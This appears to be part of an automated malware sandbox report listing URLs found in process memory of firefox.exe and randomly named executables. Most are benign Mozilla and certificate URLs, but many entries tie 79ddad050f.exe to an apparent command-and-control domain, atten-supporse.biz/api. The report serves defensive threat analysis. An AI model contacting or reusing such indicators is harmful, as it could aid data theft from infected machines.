Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 0000001B.00000002.3653135084.000001C23FBFA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3623983459.000001C23CAC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3633701258.000001C23D220000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C2444BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FBF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3623183764.000001C23CA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB36000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3523868951.000001C23BE37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3523689736.000001C23BD2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B95C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C244731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3624313828.000001C23CB67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3623183764.000001C23CA55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3180385718.000001C2447D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3253393286.000001C23DED2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3253393286.000001C23DEB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3157207703.000001C23CAC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3654754835.000001C23FD05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001B.00000002.3648161023.000001C23E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C2444BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001B.00000002.3648161023.000001C23E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C2444BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D8C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3190903073.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3523689736.000001C23BD2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3624313828.000001C23CB67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B409000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238599000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3636872771.000001C23D9D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3649402880.000001C23EB13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3649402880.000001C23EB58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3624313828.000001C23CB47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/browser-captiv
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulonDownloadBatchStarting
Source: e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3301502115.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C2444C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C2444C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001B.00000002.3628973173.000001C23CF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://youtube.com/
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca_createPermissionClearButtontemplate-permission-popup_createBlockedPopup
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001B.00000002.3654754835.000001C23FDA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191961267.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3645263356.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3244240541.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3649402880.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3626934066.000001C23CEB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3626934066.000001C23CE19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3438395331.000001C23B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239B6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orghttps://monitor.firefox.comupgradeTabsProgressListenerStreams
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D006000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D00B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D15A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CFE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CFA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpTELEMETRY_ASSEMBLE_PAYLOAD_EXCEPTIONinternal-telemetry-after-
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: 79ddad050f.exe, 00000008.00000003.3130122361.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2972144892.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3007919799.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3179670006.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3180642023.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3113176608.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093262916.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3071939046.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3058481738.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3031373012.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3166621569.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: 79ddad050f.exe, 0000000A.00000003.3166621569.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/3
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/9
Source: 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/=
Source: 79ddad050f.exe, 00000008.00000003.3130122361.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/B
Source: 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/U
Source: 79ddad050f.exe, 00000008.00000003.3007919799.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3031373012.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/YYNP
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/YYNPZ
Source: 79ddad050f.exe, 0000000A.00000003.3218476120.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3220379720.0000000001000000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3170698705.0000000001001000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000002.3286400452.0000000005930000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3218476120.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3228403714.0000000001002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api1rq
Source: 79ddad050f.exe, 00000008.00000003.3129362913.0000000001002000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3129511355.0000000001002000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiGrc
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiR
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apigq
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apipy
Source: 79ddad050f.exe, 0000000A.00000002.3261656724.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apit
Source: 79ddad050f.exe, 00000008.00000003.3093351700.000000000100D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apite
Source: 79ddad050f.exe, 0000000A.00000003.3166621569.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3231030291.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3220379720.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3233138119.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3228403714.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3170698705.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3218476120.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/c
Source: 79ddad050f.exe, 00000008.00000003.3031373012.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/imZ
Source: 79ddad050f.exe, 00000008.00000003.3093876019.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093554780.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/pp
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/r
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/z
Source: 79ddad050f.exe, 00000008.00000003.3129362913.0000000001002000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3129511355.0000000001002000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api
Source: 79ddad050f.exe, 00000008.00000003.3093262916.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3058481738.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3031373012.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3112948159.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiK
Source: 79ddad050f.exe, 00000008.00000003.3112948159.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiicrosoft
Source: firefox.exe, 0000001B.00000003.3182542929.000001C2444C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001B.00000003.3182542929.000001C2444C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: 79ddad050f.exe, 00000008.00000003.3034902192.00000000058E6000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 79ddad050f.exe, 00000008.00000003.3071958738.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 0000001B.00000002.3636872771.000001C23D903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DA29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3646061223.000001C23E66C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610655302.000001C23C377000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1170143
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180chrome://browser/skin/notification-icons/popup.s
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3243620551.000001C23E2D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3246123613.000001C23CE15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3258019114.0000001AEF4BB000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678942
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1817617
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=793869
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=806991
